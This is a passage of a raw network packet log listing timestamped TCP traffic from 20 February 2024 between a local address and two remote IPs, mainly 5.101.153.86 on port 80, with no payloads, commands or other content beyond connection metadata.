                                                                                                                                                            Feb 20, 2024 23:46:06.826651096 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826786041 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826800108 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826812029 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826827049 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826838970 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826842070 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.826853037 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826869011 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826880932 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.826884985 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826903105 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.826905012 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.826929092 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.826957941 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.827027082 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.827420950 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.827991962 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.828005075 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.828017950 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.828032970 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.828073978 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.828423023 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.828440905 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.828653097 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.828718901 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.828974009 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.829029083 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:06.857923985 CET44349720142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.984438896 CET44349720142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.984558105 CET44349720142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:06.984989882 CET49720443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:06.986174107 CET49720443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:06.986191034 CET44349720142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042546988 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042587042 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042608976 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042674065 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.042691946 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042717934 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042764902 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042767048 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.042820930 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042854071 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.042880058 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042921066 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.042922974 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.042978048 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043040037 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043045044 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043100119 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043118000 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043145895 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043185949 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043246031 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043265104 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043317080 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043376923 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043381929 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043427944 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043473959 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043490887 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043555975 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043598890 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043602943 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043665886 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043687105 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043734074 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043751955 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043806076 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043807983 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043848991 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043901920 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.043951035 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.043956041 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044003963 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.044012070 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044059038 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044132948 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044147968 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044162989 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.044193029 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.044222116 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044250965 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044298887 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044308901 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.044349909 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044399023 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.044409990 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044469118 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044482946 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044526100 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.044565916 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.044619083 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.258266926 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258290052 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258302927 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258341074 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258373022 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.258457899 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.258527040 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258647919 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258713007 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.258734941 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258800030 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258848906 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258883953 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.258896112 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258940935 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258949041 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.258980989 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.258986950 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.258995056 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259031057 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259052038 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259054899 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259087086 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259090900 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259105921 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259149075 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259169102 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259212017 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259222984 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259232044 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259246111 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259279966 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259296894 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259325027 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259332895 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259339094 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259351969 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259376049 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259388924 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259403944 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259413958 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259428978 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259464979 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259489059 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259502888 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259516954 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259536982 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259556055 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259569883 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259582996 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259591103 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259607077 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259620905 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259646893 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259675980 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259691954 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259706020 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259732962 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259776115 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259783030 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259797096 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259810925 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259840012 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259870052 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.259931087 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259944916 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259957075 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259983063 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.259994984 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260003090 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260008097 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260021925 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260035038 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260046959 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260047913 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260061026 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260072947 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260086060 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260097980 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260099888 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260114908 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260128021 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260139942 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260145903 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260158062 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260171890 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260185957 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260185957 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260225058 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260231972 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260245085 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260253906 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260257006 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260308981 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260313988 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260428905 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260617018 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260662079 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260675907 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260689020 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260724068 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260726929 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260766983 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260785103 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260802984 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260817051 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260832071 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260865927 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.260895014 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260909081 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260922909 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.260982037 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.261012077 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.261073112 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.261086941 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.261131048 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.261136055 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.261187077 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.474113941 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.474342108 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.474414110 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.474533081 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.474622965 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.474693060 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.475227118 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.475414038 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.475466967 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.475594997 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.475707054 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.475755930 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.475831985 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.475900888 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.475989103 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.476052046 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.476248980 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.476304054 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.476366043 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.476454973 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.476495981 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.476581097 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.476880074 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.476957083 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.477046013 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.477569103 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.477627993 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.477782011 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.478039026 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.478091955 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.478190899 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.478399038 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.478451967 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.478511095 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.478557110 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.478626966 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.478888035 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.479038000 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.479146004 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.479362011 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.479481936 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.479542017 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.479722977 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.479785919 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.479834080 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.479969978 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480015993 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480082989 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480098009 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.480144024 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480190992 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.480221987 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480278015 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480333090 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.480374098 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480592012 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480639935 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.480657101 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480824947 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480914116 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.480915070 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.481008053 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481049061 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.481133938 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481332064 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481381893 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.481445074 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481497049 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481544971 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.481554031 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481673002 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481734037 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481787920 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.481873035 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481892109 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481929064 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.481947899 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.481987953 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482001066 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.482040882 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482054949 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482090950 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.482139111 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482152939 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482166052 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482202053 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.482206106 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482218981 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482259989 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.482260942 CET4971980192.168.2.55.101.153.86
                                                                                                                                                            Feb 20, 2024 23:46:07.482274055 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482297897 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482311964 CET80497195.101.153.86192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.482348919 CET80497195.101.153.86192.168.2.5
